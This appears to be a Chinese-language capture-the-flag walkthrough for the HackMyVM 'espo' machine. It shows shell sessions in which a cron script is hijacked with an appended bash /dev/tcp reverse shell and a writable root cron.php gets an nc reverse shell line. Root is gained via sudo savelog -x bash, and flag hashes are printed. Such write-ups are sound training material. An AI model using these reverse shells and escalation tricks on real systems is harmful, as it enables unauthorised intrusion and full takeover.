drwxr-xr-x 2 root root 4096 Dec 4 16:44 .
drwxr-xr-x 18 root root 4096 Dec 4 07:02 ..
(remote) www-data@espo:/opt$ cd ..
(remote) www-data@espo:/$ ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
(remote) www-data@espo:/$ cd home
(remote) www-data@espo:/home$ ls
mandie
(remote) www-data@espo:/home$ cd mandie/
(remote) www-data@espo:/home/mandie$ ls
copyPics pictures user.txt videos
(remote) www-data@espo:/home/mandie$ file *
copyPics: Bourne-Again shell script, ASCII text executable
pictures: directory
user.txt: regular file, no read permission
videos: directory
(remote) www-data@espo:/home/mandie$ cat copyPics
(见下面)
(remote) www-data@espo:/home/mandie$ cd pictures/
(remote) www-data@espo:/home/mandie/pictures$ ls
bedroom.jpg burger.jpeg dad-baby.jpg dorothy.jpeg family.jpg maldives.jpg
(remote) www-data@espo:/home/mandie/pictures$ cd ../videos/
(remote) www-data@espo:/home/mandie/videos$ ls -la
total 6632
drwxr-xr-x 2 mandie mandie 4096 Apr 4 08:30 .
drwxr-xr-x 6 mandie mandie 4096 Apr 4 08:30 ..
-rw-r--r-- 1 mandie mandie 6779935 Apr 4 08:30 sky.mp4
(remote) www-data@espo:/home/mandie/videos$ cd ..
(remote) www-data@espo:/home/mandie$ ls -la
total 48
drwxr-xr-x 6 mandie mandie 4096 Apr 4 08:32 .
drwxr-xr-x 3 root root 4096 Jan 24 19:01 ..
lrwxrwxrwx 1 root root 9 Jan 26 19:39 .bash_history -> /dev/null
-rw-r--r-- 1 mandie mandie 220 Dec 4 15:42 .bash_logout
-rw-r--r-- 1 mandie mandie 3526 Dec 4 15:42 .bashrc
drwxr-xr-x 3 mandie mandie 4096 Dec 4 15:42 .local
drwxr-xr-x 12 mandie mandie 4096 Dec 4 15:42 .oh-my-zsh
-rw-r--r-- 1 mandie mandie 807 Dec 4 15:42 .profile
-rw-r--r-- 1 mandie mandie 3890 Dec 4 15:42 .zshrc
-rwxr-xr-- 1 mandie mandie 493 Dec 4 15:42 copyPics
drwxr-xr-x 2 mandie mandie 4096 Apr 4 08:32 pictures
-rwx------ 1 mandie mandie 33 Jan 24 19:01 user.txt
drwxr-xr-x 2 mandie mandie 4096 Apr 4 08:32 videos
找到了一个脚本:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/bin/bash
SOURCE_MEDIAS="/var/shared_medias"
PICTURES_DIR="$HOME/pictures"
VIDEOS_DIR="$HOME/videos"
/usr/bin/find "$SOURCE_MEDIAS" ! -executable -exec /usr/bin/cp {} "$HOME" 2>/dev/null \;
mkdir -p "$PICTURES_DIR" "$VIDEOS_DIR"
declare -A directory_mappings
directory_mappings=( ["$PICTURES_DIR"]="jpeg jpg" ["$VIDEOS_DIR"]="mp4 avi" )
for dir in "${!directory_mappings[@]}"; do
for ext in ${directory_mappings[$dir]}; do
mv "$HOME"/*.$ext "$dir/" 2>/dev/null
done
done
方法一:使用copyPics获取用户,然后再获取root
脚本将/var/shared_medias中的不可执行文件放到自己所在的目录执行,这就要求我们这个用户无法执行,但是mandie用户可以执行的文件,就是文件本身,我们尝试复制到/var/shared_medias,结尾添加反弹shell命令,看看能不能弹回来,这个应该是定时任务,不过不确定,先搞完,然后上传pspy64监听一下:
1
2
3
cd /var/shared_medias
cp /home/mandie/copyPics copyPics
echo "/bin/bash -i >& /dev/tcp/172.20.10.8/2345 0>&1" >> copyPics
可以看到确实是定时任务,下面的方法二则是基于root权限执行的一个定时任务直接进行提权的。
然后就拿到shell了!
提权至root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
(remote) mandie@espo:/home/mandie$ sudo -l
sudo: unable to resolve host espo: Name or service not known
Matching Defaults entries for mandie on espo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User mandie may run the following commands on espo:
(ALL : ALL) NOPASSWD: /usr/bin/savelog
(remote) mandie@espo:/home/mandie$ /usr/bin/savelog
(remote) mandie@espo:/home/mandie$ /usr/bin/savelog -h
Usage: savelog [-m mode] [-u user] [-g group] [-t] [-c cycle] [-p]
[-j] [-C] [-d] [-l] [-r rolldir] [-n] [-q] file ...
-m mode - chmod log files to mode
-u user - chown log files to user
-g group - chgrp log files to group
-c cycle - save cycle versions of the logfile (default: 7)
-r rolldir - use rolldir instead of . to roll files
-C - force cleanup of cycled logfiles
-d - use standard date for rolling
-D - override date format for -d
-t - touch file
-l - don't compress any log files (default: compress)
-p - preserve mode/user/group of original file
-j - use bzip2 instead of gzip
-J - use xz instead of gzip
-1 .. -9 - compression strength or memory usage (default: 9, except for xz)
-x script - invoke script with rotated log file in $FILE
-n - do not rotate empty files
-q - suppress rotation message
file - log file names
(remote) mandie@espo:/home/mandie$ find / -name "*.log" 2>/dev/null
/var/www/html/data/logs/espo-2023-12-04.log
/var/www/html/data/logs/espo-2024-01-24.log
/var/www/html/data/logs/espo-2024-04-04.log
/var/log/alternatives.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/dpkg.log
/var/log/php8.2-fpm.log
/var/lib/mysql/ddl_recovery-backup.log
/var/lib/mysql/ddl_recovery.log
(remote) mandie@espo:/home/mandie$ sudo /usr/bin/savelog -x /var/log/nginx/access.log
sudo: unable to resolve host espo: Name or service not known
(remote) mandie@espo:/home/mandie$ sudo /usr/bin/savelog -x bash /var/log/nginx/access.log
sudo: unable to resolve host espo: Name or service not known
root@espo:/home/mandie# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@espo:/home/mandie# cat /root/root.txt
0f4580e1632070ea32ead6334c0527c4
方法二:定时任务直接获取root
群主ll104567发现了一种新方法,也可能是作者留下的彩蛋,在监听进程的时候,有一个管理员权限的定时任务在触发,且任务可写!
1
echo "system('nc 172.20.10.8 3456 -c /bin/bash');" >> cron.php
再找一下user.txt:
1
2
3
4
(remote) root@espo:/var/www/html# cd /home
(remote) root@espo:/home# cd mandie/
(remote) root@espo:/home/mandie# cat user.txt
b462a4ac056477047a56ea23e6bbce19
打靶完成!
额外收获
扩展shell常用命令
1
2
3
4
5
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
(ctrl+z)
stty raw -echo;fg
reset
28师傅总结的:https://28right.blogspot.com/2024/03/espo-hackmyvm.html
本文由作者按照 CC BY 4.0 进行授权